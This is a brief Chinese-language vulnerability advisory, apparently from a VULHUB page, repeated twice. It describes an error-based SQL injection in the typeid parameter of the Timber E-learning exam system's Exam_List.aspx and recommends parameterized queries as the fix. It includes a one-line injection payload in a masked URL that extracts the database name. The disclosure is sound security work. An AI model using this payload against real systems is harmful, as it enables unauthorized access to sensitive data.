VULHUB ™

###0x01漏洞简介 Timber E-learning 天柏在线考试系统在/Web/Exam_List.aspx由于对参数typeid过滤不严，导致出现SQL注入漏洞。远程攻击者可以结合错误回显的方式执行SQL指令，获取敏感信息。 ###0x02漏洞利用 以下面为例子： ``` http://***/Web/Exam_List.aspx?typeid=141 and db_name()>0 ```  ###0x03修复方案 过滤，或使用参数化的SQL语句。

###0x01漏洞简介 Timber E-learning 天柏在线考试系统在/Web/Exam_List.aspx由于对参数typeid过滤不严，导致出现SQL注入漏洞。远程攻击者可以结合错误回显的方式执行SQL指令，获取敏感信息。 ###0x02漏洞利用 以下面为例子： ``` http://***/Web/Exam_List.aspx?typeid=141 and db_name()>0 ```  ###0x03修复方案 过滤，或使用参数化的SQL语句。